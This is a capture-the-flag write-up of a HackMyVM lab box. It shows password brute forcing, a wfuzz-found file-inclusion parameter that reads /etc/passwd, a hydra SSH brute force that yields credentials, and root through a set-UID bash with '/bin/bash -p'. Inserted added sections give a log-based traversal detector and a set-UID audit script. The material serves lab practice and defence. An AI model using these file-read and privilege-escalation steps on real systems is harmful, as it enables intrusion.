─$ nmap -p- --min-rate 10000 192.168.186.206
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-03-13 23:32 EDT
Nmap scan report for 192.168.186.206
Host is up (0.26s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
423/tcp open opc-job-start
Nmap done: 1 IP address (1 host up) scanned in 22.99 seconds
After some probing, both 80 and 423 turned out to be web servers.
Scanning port 80 turned up /robots.txt:
# =================================================================
# CTF CHALLENGE - ROBOTS.TXT
# =================================================================
User-agent: *
Disallow: /admin.txt
Disallow: /login.txt
Disallow: .config
Disallow: .backup
Disallow: .user.txt
Disallow: /wp-admin
After trying each entry, .user.txt had content; it was HTML-entity encoded, and decoding it gave:
admin
john
alice
sysadmin
ctf_player
<-----passwd top 500----->
Five users, plus a hint for the password: "passwd top 500". Searching online for such a password list found
https://github.com/insightglacier/Dictionary-Of-Pentesting/blob/master/Password/password-top1000.txt
I could not find a top-500 list, so I used a top-1000 one instead.
Opening the site on port 423 shows a login form; capturing the request shows that the username and password are encrypted and stored in the cookie.
I gave the page source from port 423 to an AI and had it write a brute-force script, using the usernames and passwords found above.
After running it, I got ctf_player:genesis.
After logging in, the site redirects to .hint.php; the middle of the page says to use wfuzz, so try that:
wfuzz -c -w /usr/share/wordlists/dirb/big.txt -u 'http://192.168.186.206:423/.hint.php?FUZZ=../../../etc/passwd' -H "Cookie: PHPSESSID=im7v269fov7lbhmha4nv22f96d" --hh 1144
This found the parameter xfer; using http://192.168.186.206:423/.hint.php?xfer=../../../etc/passwd
returned nothing, so I tried other forms of the path.
http://192.168.186.206:423/.hint.php?xfer=/etc/passwd echoes the passwd file.
This gave the users 2002 and MS02423.
Brute-force SSH with hydra using those 1000 passwords:
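The wfuzz step above and the two xfer requests that follow it illustrate a detection gap: the `../../../etc/passwd` attempt returned the baseline-sized page (hidden by `--hh 1144`), while the absolute path `/etc/passwd` was the one that actually disclosed the file. A web access log monitor that only matches `../` would therefore alert on the failed request and miss the successful one. The following is an added example, not code from the original write-up: it parses a few constructed Apache-style access-log lines (modelled on this box's URLs, with made-up IPs and timestamps) and flags traversal sequences, absolute sensitive paths and PHP stream wrappers in any query parameter, double-decoding percent encoding so `%252e%252e%2f` is caught as well.

```python
import re
from typing import Optional
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample access-log lines in Apache combined format; not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [13/Mar/2026:23:40:01 -0400] "GET /.hint.php?xfer=../../../etc/passwd HTTP/1.1" 200 1144 "-" "Mozilla/5.0"
10.0.0.5 - - [13/Mar/2026:23:40:02 -0400] "GET /.hint.php?xfer=/etc/passwd HTTP/1.1" 200 2381 "-" "Mozilla/5.0"
10.0.0.5 - - [13/Mar/2026:23:40:03 -0400] "GET /.hint.php?xfer=..%2F..%2Fetc%2Fshadow HTTP/1.1" 200 1144 "-" "Mozilla/5.0"
10.0.0.9 - - [13/Mar/2026:23:41:10 -0400] "GET /index.php?page=home HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [13/Mar/2026:23:41:11 -0400] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Minimal combined-log-format parser: client IP, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Absolute paths whose appearance in a file-name parameter is a strong file-read signal
# (constructed list; extend it for the application being monitored).
SENSITIVE_PREFIXES = ("/etc/passwd", "/etc/shadow", "/proc/self/environ",
                      "/var/log/", "/root/", "/home/")


def classify_param(value: str) -> Optional[str]:
    """Return a finding label for one query value, or None if it looks benign."""
    decoded = unquote(unquote(value))  # double-decode to catch %252e%252e%252f style evasion
    if "../" in decoded or "..\\" in decoded:
        return "traversal"
    if decoded.startswith(SENSITIVE_PREFIXES):
        return "absolute-path"
    if decoded.startswith(("php://", "file://", "data://", "expect://")):
        return "stream-wrapper"
    return None


def scan_log(text: str) -> list:
    """Parse each log line and return one finding dict per suspicious query parameter."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        parts = urlsplit(m["target"])
        # parse_qsl already percent-decodes once; classify_param decodes further.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            label = classify_param(value)
            if label:
                findings.append({
                    "ip": m["ip"], "time": m["ts"], "path": parts.path,
                    "param": name, "value": value, "label": label,
                    "status": int(m["status"]), "size": m["size"],
                })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['label']:14} {f['path']}?{f['param']}={f['value']} -> {f['status']} {f['size']}")
```

The response size column is worth keeping in the alert: on this box the successful read is the request whose size differs from the 1144-byte baseline, so correlating size changes with flagged parameters separates a probe from an actual disclosure.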
2002:softball
After connecting over SSH, the shell prompt displayed as a bare bash-5.0 prompt.
From repeated experience with a set-UID bash, that is the sign that /bin/bash can simply be run directly (with -p):
-bash-5.0$ /bin/bash -p
bash-5.0# id
uid=1000(2002) gid=1000(2002) euid=0(root) egid=0(root) 组=0(root),1000(2002)
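The privilege escalation above works only because /bin/bash carries the set-UID bit and is owned by root; `-p` tells bash to keep the effective UID instead of dropping it. The check a system owner would want is an inventory of set-UID/set-GID files compared against a known baseline, with root-owned shells flagged as critical. Below is an added example, not code from the write-up or from the target: it walks a directory tree with `os.lstat`, reports any regular file with set-UID or set-GID, and the `demo()` helper builds a throwaway constructed tree (a fake set-UID `bash`, a fake set-UID `passwd` that is in the baseline, and a plain `ls`) so the audit can run offline as an unprivileged user; on a real host you would pass `/` and `privileged_uid=0`.

```python
import os
import stat
import tempfile

# Basenames that hand out an unrestricted shell when set-UID root (constructed, not exhaustive).
SHELL_NAMES = {"bash", "sh", "dash", "zsh", "ksh", "fish"}


def find_setid_files(root):
    """Walk `root` and return {path: (owner_uid, mode)} for every regular file
    with the set-UID or set-GID bit set. Symlinks are not followed."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # vanished or unreadable entry; keep scanning
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                hits[path] = (st.st_uid, stat.S_IMODE(st.st_mode))
    return hits


def audit(hits, baseline, privileged_uid=0):
    """Split findings into 'critical' (set-UID shells owned by the privileged user)
    and 'unexpected' (any set-ID file not present in the approved baseline set)."""
    critical = sorted(
        p for p, (uid, mode) in hits.items()
        if uid == privileged_uid and mode & stat.S_ISUID and os.path.basename(p) in SHELL_NAMES
    )
    unexpected = sorted(p for p in hits if p not in baseline)
    return {"critical": critical, "unexpected": unexpected}


def demo():
    """Constructed self-contained scenario: one set-UID 'bash', one baselined set-UID
    'passwd', one ordinary 'ls'. Returns the audit with paths relative to the temp root."""
    with tempfile.TemporaryDirectory() as tmp:
        bin_dir = os.path.join(tmp, "bin")
        os.makedirs(bin_dir)
        for name, mode in (("bash", 0o4755), ("passwd", 0o4755), ("ls", 0o755)):
            path = os.path.join(bin_dir, name)
            with open(path, "w") as fh:
                fh.write("#!/bin/sh\n")  # placeholder content; only the mode bits matter
            os.chmod(path, mode)
        hits = find_setid_files(tmp)
        baseline = {os.path.join(bin_dir, "passwd")}
        # The files are owned by the current user, so treat that UID as "privileged" here.
        report = audit(hits, baseline, privileged_uid=os.getuid())
        return {k: [os.path.relpath(p, tmp) for p in v] for k, v in report.items()}


if __name__ == "__main__":
    print(demo())
```

Running `find_setid_files("/")` periodically and diffing against a stored baseline is the practical form of this check; a new entry such as a set-UID `bash` is exactly the change that turns a low-privilege SSH login into root on this box.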
THIS OVER
Unless otherwise noted, all articles on this blog are the author's original work.
If reposting, please credit the source: https://sanopll.top/hmv-ms02423%e9%9d%b6%e6%9c%ba%e5%a4%8d%e7%9b%98/